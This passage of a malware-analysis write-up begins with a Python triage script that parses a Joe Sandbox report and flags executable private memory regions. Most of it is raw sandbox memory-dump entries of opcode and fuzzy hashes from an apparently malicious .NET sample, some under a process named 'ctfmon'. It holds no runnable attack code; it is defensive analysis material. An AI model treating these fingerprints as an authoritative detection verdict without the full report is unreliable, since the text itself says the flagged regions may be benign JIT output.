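                             snap["sample"], f.get("Opcode ID", ""), f.get("String ID", "")))
    return entries

def summarize(entries: list) -> dict:
    """Group fingerprints by (process index, region base) and record what kind of memory each region is."""
    out = {}
    for e in entries:
        s = out.setdefault((e.proc, e.base), {"sample": e.sample, "functions": 0, "with_strings": 0,
                                              "consistent": True, "protection": e.protect_name,
                                              "type": e.mem_type_name, "executable": e.executable,
                                              "pe_backed": e.pe_backed})
        s["functions"] += 1
        s["with_strings"] += bool(e.string_id)
        s["consistent"] = s["consistent"] and e.consistent()
    return out

def dynamic_code_regions(summary: dict) -> list:
    """Executable, private and not image-backed: JIT output for a .NET sample, but also the profile of an
    unpacked stage or injected shellcode, so flag the region rather than assume."""
    return sorted(k for k, s in summary.items()
                  if s["executable"] and s["type"] == "MEM_PRIVATE" and not s["pe_backed"])

# Constructed sample: three entries in the shape of this page's, with shortened hash values.
SAMPLE = r"""
Memory Dump Source
• Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
• Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
• String ID:
• Opcode ID: 2597fb035df9dd5a
Memory Dump Source
• Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
• Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
• String ID:
• Opcode ID: 8659fa0e1aadfc7a
Memory Dump Source
• Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
• Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
• String ID: cx\I
• Opcode ID: 28ec827474f15f3e
"""

if __name__ == "__main__":
    for key, s in summarize(parse_report(SAMPLE)).items():
        print(f"proc {key[0]} @ {key[1]:#x}: {s}")
```

Under the assumed field meanings, both regions on this page are PAGE_EXECUTE_READWRITE private memory with no PE image behind them. For a .NET sample (the report's own signatures identify the binary as .NET) that is typically where the JIT emits compiled managed code, so these opcode and fuzzy hashes describe JIT output rather than the on-disk file and will not match a static disassembly of it. The same profile is what an unpacked payload or injected shellcode looks like, which is why the triage function flags such regions for a look instead of discarding them as JIT noise.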
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID: cx\I
                  • API String ID: 0-1262179701
                  • Opcode ID: 28ec827474f15f3e5103502fe9f924d35dbf502bc3d64579b854a3f95d33dabb
                  • Instruction ID: 02f6f61f1a8773c08b129d6471d490046e159dc97e80a48038412ca1972735cd
                  • Opcode Fuzzy Hash: 28ec827474f15f3e5103502fe9f924d35dbf502bc3d64579b854a3f95d33dabb
                  • Instruction Fuzzy Hash: 5472CC3190D68A8FEB45EB2888596FA7BF0FF29351F1405BBD009C71E2EB38A844C755
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID: V_H
                  • API String ID: 0-105569101
                  • Opcode ID: f4b58ab974f2d6172a023646d90fc344dd4bdd589dc0c9e267dd3d762ab46177
                  • Instruction ID: 391850bf0bdc1c5f8dad599f02df32897be2d5b9ad55a7a09865455bbe61f82f
                  • Opcode Fuzzy Hash: f4b58ab974f2d6172a023646d90fc344dd4bdd589dc0c9e267dd3d762ab46177
                  • Instruction Fuzzy Hash: 7AF1DE7190DA8E8FEB49EB688859BA9BFF1FF59340F5401BAC009D72D2DB786445CB01
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7b3498c7697e49a6339a217f52c16eeefcd8b61b98b2e5c620c8125117c46ab6
                  • Instruction ID: b082c0417b08c6563a4ced1b74cba22f4c1228e2dc0013eaadabd0071fe966d0
                  • Opcode Fuzzy Hash: 7b3498c7697e49a6339a217f52c16eeefcd8b61b98b2e5c620c8125117c46ab6
                  • Instruction Fuzzy Hash: 09929E3090D6898FDB46EF2488696A97FF0FF2A301F0545EBD449D71A2EB38A585C711
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6c8081d64b3b29e341bb88f6aac0a642fc5de5731bd7e4e5c5887c5fb91f326f
                  • Instruction ID: 884fdc0bc45de50d72e98fe0c46b7ca89d2f3a371f7848dec21f0aa573fe932c
                  • Opcode Fuzzy Hash: 6c8081d64b3b29e341bb88f6aac0a642fc5de5731bd7e4e5c5887c5fb91f326f
                  • Instruction Fuzzy Hash: 0DD19E3090D68A8FEB95EF2488592FABBE0FF55345F0405BBD809C71D2DB38AA54C785
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cd8fe3f6aa6a14fcd34450729fa41a81b49c3bc24ca06cdc4cc5ef6edf8b193e
                  • Instruction ID: 5c8459eec4c0fd5098c0b0ca54b8945c4f9ecb7967e3669af42bd97248b103cc
                  • Opcode Fuzzy Hash: cd8fe3f6aa6a14fcd34450729fa41a81b49c3bc24ca06cdc4cc5ef6edf8b193e
                  • Instruction Fuzzy Hash: 91C1BD3090D68A9FE746EB2888986F97BF0FF29344F0545BBD409D70D2EB39A588C715
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID: H
                  • API String ID: 0-2852464175
                  • Opcode ID: 438d23b4492026d6c87f69638da906098cd8fdec40f6d03807dde60b893ca410
                  • Instruction ID: f37488274fdab7530d2264d9101666529691a65770ebfe93471ba2ed7a773447
                  • Opcode Fuzzy Hash: 438d23b4492026d6c87f69638da906098cd8fdec40f6d03807dde60b893ca410
                  • Instruction Fuzzy Hash: D7A19D30D0D68A8FE795FB6488592B97BA0FFA5750F0445BBD808E71D3EF38A5488B44
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID: @qH
                  • API String ID: 0-324703140
                  • Opcode ID: daca6ef331a38bacfbc554d4ec93b680d888c6e2f28dcbdd2e198c80f2e6db82
                  • Instruction ID: 80800819c414c0bc87f3655a7f556420fe0e860abb3bedc2ec2f699dc1b541e8
                  • Opcode Fuzzy Hash: daca6ef331a38bacfbc554d4ec93b680d888c6e2f28dcbdd2e198c80f2e6db82
                  • Instruction Fuzzy Hash: FB514631D1DA0E9FFB98EB68C855ABDBBB1FF58340F64017AD40AD2295DB3868418744
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: 09b04a0939869f3cd464f94bb3c6f67f7ab7f970e0f907d7f6e00a477f56588f
                  • Instruction ID: 0e9ecb43bf582ab13af20a2f9f943d6e1b8fb9b36e80292f53883c529e55e2c3
                  • Opcode Fuzzy Hash: 09b04a0939869f3cd464f94bb3c6f67f7ab7f970e0f907d7f6e00a477f56588f
                  • Instruction Fuzzy Hash: 8251BF3090CA5E8FEB58EB68C8596F97BE0FF69751F0400BBD00AE71D2DB25A984C750
                  Strings
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: e3e8a3cdb8605f64e80d24ebed16d6ba6f084b0663bab2a7e2c64981671e524a
                  • Instruction ID: ef37810a127a869138b532175bfc1496652b1b57d93643214fa57deb4edf521b
                  • Opcode Fuzzy Hash: e3e8a3cdb8605f64e80d24ebed16d6ba6f084b0663bab2a7e2c64981671e524a
                  • Instruction Fuzzy Hash: B731A030D0DA6E8FEB98EB68D8192F977E0FF69751F04017BD409E31D2DB24A9848751
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bf09177a715bdf35e03fe7ad40e51f668c6278c4a69c9cbc975cc46a0df6f4d5
                  • Instruction ID: 2054a5e8bdbcf97fc6b49fa42b9be0dabbd8620d53a91eff60c2ce437ded0076
                  • Opcode Fuzzy Hash: bf09177a715bdf35e03fe7ad40e51f668c6278c4a69c9cbc975cc46a0df6f4d5
                  • Instruction Fuzzy Hash: 18D1AE30D0D68A8FEB41FBA888596B9BBF0EF29750F0405B7D408E71E2EB38A544C715
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 53609e225bcedd9a73249bf1585b3a76c5b5b46b0b20cf9d0126554d91a72ed7
                  • Instruction ID: 25ef23c3964502ab83693828edf13aea59702a586496dd1ccda3686055abc516
                  • Opcode Fuzzy Hash: 53609e225bcedd9a73249bf1585b3a76c5b5b46b0b20cf9d0126554d91a72ed7
                  • Instruction Fuzzy Hash: 2DD17D3090D78A8FEB95EF2888192FA7BB0FF26710F0515BBD418D71A2EB38A554C745
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60b5d15c7f9de90fa42ac442a415d37e15d7e1ad479890411d5ba74981f036d2
                  • Instruction ID: ae4b120dab1f0dff19d05abd489570bd9811846e17cc508e844cbbcff0b41aea
                  • Opcode Fuzzy Hash: 60b5d15c7f9de90fa42ac442a415d37e15d7e1ad479890411d5ba74981f036d2
                  • Instruction Fuzzy Hash: A2B15A3090D64E8FEB95EF688859AFABBF0FF19341F0445BAD409D7192EB38A544CB44
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1d0344f59cadb50703b0f725c59af412b9a4e753f3b4d5aa34041463af41a5f5
                  • Instruction ID: bd2e493c924d6c133028791a0a337239a9d3f75e7b9de245f48f7443603cdffa
                  • Opcode Fuzzy Hash: 1d0344f59cadb50703b0f725c59af412b9a4e753f3b4d5aa34041463af41a5f5
                  • Instruction Fuzzy Hash: 06B18C3090D68E8FEB95EF2888192FA7BB0FF25700F0515BBD418D71A2EB38A554C745
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c64f8e1e7a5773b16440e4fb6135bf7671ce080ffc7213b978db6d6cefb444a
                  • Instruction ID: 143b756c7d384199127d015be28c89a87c3913cc103f479b766b10de15f84b18
                  • Opcode Fuzzy Hash: 4c64f8e1e7a5773b16440e4fb6135bf7671ce080ffc7213b978db6d6cefb444a
                  • Instruction Fuzzy Hash: 43B16C30D0D6498FEB55EB68C858AE97BF1FF69740F0441BAD409E71E2DB38A944CB14
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: da2c2c16cd553aa71d3dbd1f27281a4ef61b1e721e039153cd4aa285fa51ff4f
                  • Instruction ID: 174e9a7b2dbbb4d987f5ebf5edea5a4d1f592c9119284678779cf44998885e60
                  • Opcode Fuzzy Hash: da2c2c16cd553aa71d3dbd1f27281a4ef61b1e721e039153cd4aa285fa51ff4f
                  • Instruction Fuzzy Hash: D091F331A0CA9A4FDB49EF2888551BA7BE1FFA5750F1001BFD449D32C2DB35A842C745
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9960e68c95fe43f0e42c1ef4dc9ff38960696a24bd4630cfd5dd43752cff87c8
                  • Instruction ID: 29a8f6c306f7007a8a80a4a0feb382f637080c08e126c696dfe6d55b2ee16aeb
                  • Opcode Fuzzy Hash: 9960e68c95fe43f0e42c1ef4dc9ff38960696a24bd4630cfd5dd43752cff87c8
                  • Instruction Fuzzy Hash: 1E918C3090D68E8FEB95EF2888186FA3BB0FF25740F0515BBD419D71A2EB38A544C745
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60e2fe1e2681783f131183889ed17531af8a799f42c6f36baa9f9f8fbe2d6525
                  • Instruction ID: 0682e07a32c470312258ad1c9119d9078a4a4793ecf6622f6416dc62e88e78bc
                  • Opcode Fuzzy Hash: 60e2fe1e2681783f131183889ed17531af8a799f42c6f36baa9f9f8fbe2d6525
                  • Instruction Fuzzy Hash: D3819F30A1CA9A8FDB48EF2888555BA77E1FFA8750F10457FD40AD32D2DB35A882C745
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 957e459d59def4dee2fb10f1635a9f89e4998a9001591a5f389087c3f5edea3b
                  • Instruction ID: e4b2ba5ce32de64e44765e56f0aa3889c4e20698c92d93310bb2c1717522ae1c
                  • Opcode Fuzzy Hash: 957e459d59def4dee2fb10f1635a9f89e4998a9001591a5f389087c3f5edea3b
                  • Instruction Fuzzy Hash: 1EA19E30D0D65A8FEBA8EB6488557F8B6A0FF65780F0041BAD40DE71D2DF386985CB58
                  Memory Dump Source
                  • Source File: 00000011.00000002.2106447875.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_17_2_7ff848f40000_tcEcURjxxClvKHXzINDGbUbctpEdgO.jbxd
                  Similarity
                  • API ID:
                  • Instruction ID: b1994ae40689fc39400f0f89f92bd3ee8bd6c8a6c7d9c371a45a2fa88a97eb98
                  • Opcode Fuzzy Hash: adfe96cd5f9b6f6c9c22926c6b622212c79fd3e7d1497942b0060334b533cb03
                  • Instruction Fuzzy Hash: D1129171C0E6DA9FE796EF2488592F9BBE0FF26341F0405BAD808C61D3EB286544C756
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ef4042711016b245a96b87d80af79c99180369fe46d6fec895497427e0de419f
                  • Instruction ID: e5def1876480a41fb3e1c0e56cc1299c1852b75e26ccab2be108f8cd1b60b59d
                  • Opcode Fuzzy Hash: ef4042711016b245a96b87d80af79c99180369fe46d6fec895497427e0de419f
                  • Instruction Fuzzy Hash: 52718D3084DA898FEB46AB3488696F9BBA0EF1A341F1504BAD409CB0E3DB29A545C755
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6b88b220df5a45d4cc1b34e25dbb297d1c661d34aa6c4d18d8270b4af4d7568
                  • Instruction ID: f3357423981a238cd0d9985fc950a4b9fee49ac02a06e14745d14fdea77d6295
                  • Opcode Fuzzy Hash: a6b88b220df5a45d4cc1b34e25dbb297d1c661d34aa6c4d18d8270b4af4d7568
                  • Instruction Fuzzy Hash: 07115E71D0D68A9EE752E72C88595A9BFF0FF16344F4904F6D048C71E3EB28A9448712
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 16a3b5e6e88f9a4b0a2dbe4a82525d20a0d12304f63ee7f9190e98492c7d4c51
                  • Instruction ID: 80241488104b028d476ff8b04ecc1bc32a480ace02b0edc412a780e2b5bdbb4a
                  • Opcode Fuzzy Hash: 16a3b5e6e88f9a4b0a2dbe4a82525d20a0d12304f63ee7f9190e98492c7d4c51
                  • Instruction Fuzzy Hash: 61C12670D0C6599EEB95EB6C98597A9BBF1FF19340F4041BAD00DE3292DB3869848B14
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 59af0daab142c16975952ed63997d142357354ce62c62fe6aafc98b4221edc8f
                  • Instruction ID: 70908b25e7771e04420904dda1b291fcbf3ca9e75b2b666893474d5c91eb8611
                  • Opcode Fuzzy Hash: 59af0daab142c16975952ed63997d142357354ce62c62fe6aafc98b4221edc8f
                  • Instruction Fuzzy Hash: 96A18D3080DA8A9FEB52FB7488595B9BBF0FF1A350F0545BAD408C7093EB38A554C759
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ece0fa4503eccc7d9078a5874b3878f3221132f3617babd5a2c8d233c9191122
                  • Instruction ID: d616662b709f2876587bded9924c7b3587f28ec996627157c314857f7b0245df
                  • Opcode Fuzzy Hash: ece0fa4503eccc7d9078a5874b3878f3221132f3617babd5a2c8d233c9191122
                  • Instruction Fuzzy Hash: 82A19E7090DA8A8FEB56EB28C8586F9BBF0FF19341F1504BAC409C71D2EB78A544C759
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d814185bbbb45d65b75feb780e861d313cba5c6d47a1a3420f3410af7daa9dbe
                  • Instruction ID: bad753402370c061fc130401bc2adeb751d0203c6d5b2820bb597bf7a8e5e793
                  • Opcode Fuzzy Hash: d814185bbbb45d65b75feb780e861d313cba5c6d47a1a3420f3410af7daa9dbe
                  • Instruction Fuzzy Hash: 7C719B31A0CA5A8FDB48EF1C98516A977E2FFA8B50F14017AD44ED32C2CF34A842C785
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a56efe544253aef1ac0ef4672e03daf8a0bd1e8eddc29a10737880723bb9747b
                  • Instruction ID: 1114e10842864c73d4c48624e9c9303f4f268923702d80f5d5e6bccb5fb4ee00
                  • Opcode Fuzzy Hash: a56efe544253aef1ac0ef4672e03daf8a0bd1e8eddc29a10737880723bb9747b
                  • Instruction Fuzzy Hash: 3D91893090C68E8FEB95EF24C8592B9BBF1FF59300F1405BAD809C7192DB38A984CB44
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e3275c459c01e8bafc1d5e9309fcaaeacfd30afce35be33b67e926f71e8336ed
                  • Instruction ID: bf55815aaa4aaadafc66af0425b8549297a9120d4974d93804010d4b74356bd1
                  • Opcode Fuzzy Hash: e3275c459c01e8bafc1d5e9309fcaaeacfd30afce35be33b67e926f71e8336ed
                  • Instruction Fuzzy Hash: B5910A30D0C55E8EEB90EBA888487EDBBB1FF59340F1041BAD00DE7292DB3469848B54
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4b4f1f901cbdb4b86d9832cd9bc9e476c5df18844565060e5e33aaa3810e4c18
                  • Instruction ID: 75bdd5005866d878a91606ab0508d598d766028ba9ab7e3a462e15134cf0f0ce
                  • Opcode Fuzzy Hash: 4b4f1f901cbdb4b86d9832cd9bc9e476c5df18844565060e5e33aaa3810e4c18
                  • Instruction Fuzzy Hash: 5D718C30D1D68A8FEB55EF64C8592FABBE0FF19340F04467AE809C21D2EB38A554CB45
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3770eaefb504f91ce03ab0f9881ff77666207b8ca9755a648a58999d325e15b4
                  • Instruction ID: 81dffb310885459e2cd2896f61fc075b8b5eda2e693cbe7842b7ee6ef566d0a5
                  • Opcode Fuzzy Hash: 3770eaefb504f91ce03ab0f9881ff77666207b8ca9755a648a58999d325e15b4
                  • Instruction Fuzzy Hash: BD51E13691E566AAE7417B6CB8411FA3B60EF517B8F181337D18C9D0D3EF2C208582AC
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 07472e38ee51e2a746a0a5bf0f0e8932f0c2a456fe6a4dfa0cae130da1a39956
                  • Instruction ID: dae82ca4976d34af7dc2eb824fa16103dde4ce5adf3f4d16d3563ead3a20ef3d
                  • Opcode Fuzzy Hash: 07472e38ee51e2a746a0a5bf0f0e8932f0c2a456fe6a4dfa0cae130da1a39956
                  • Instruction Fuzzy Hash: 35717570D0DA4A8FEB55EF64C8596BDBBF1EF59380F10017AD409D72C2DB38A8448B89
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a69945d4c635a15362a6ecb5e18124b7e5c2cc3d57015c416ad3d2361045746a
                  • Instruction ID: ae619a4431935dc56b19657b8196d182d8c4c807f5f6efc2fb3ee8c277cba876
                  • Opcode Fuzzy Hash: a69945d4c635a15362a6ecb5e18124b7e5c2cc3d57015c416ad3d2361045746a
                  • Instruction Fuzzy Hash: 6B81B570D1991D9FEBA4EBA8C8957ADB7B1FF58340F1042BAD00DE3292DF3469848B44
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d3f510f2b7624e06085b7dc159e1960c200d9427d34d22c6bd40f9f9cbd2dd21
                  • Instruction ID: 0ee7e9951e1b4e39463cc5a593305b7d8b96f7a7ae168067b80f358a787e46f9
                  • Opcode Fuzzy Hash: d3f510f2b7624e06085b7dc159e1960c200d9427d34d22c6bd40f9f9cbd2dd21
                  • Instruction Fuzzy Hash: 9151BE31A0CA5A8FDB48EF1888555BA77E2FFA8B50F10457FD45AD3282CF34A842C785
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8482e314e3235a50c2360c6e268679add2889f30fd0eb6464533a68769e5487
                  • Instruction ID: eef23178ccc9ab2e0604cc30cc6f44df111a1b7bc5d91d1f8a7460978bf16efd
                  • Opcode Fuzzy Hash: b8482e314e3235a50c2360c6e268679add2889f30fd0eb6464533a68769e5487
